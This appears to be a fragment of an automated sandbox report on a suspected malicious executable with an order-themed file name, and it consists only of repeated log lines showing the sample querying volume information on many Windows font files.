            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
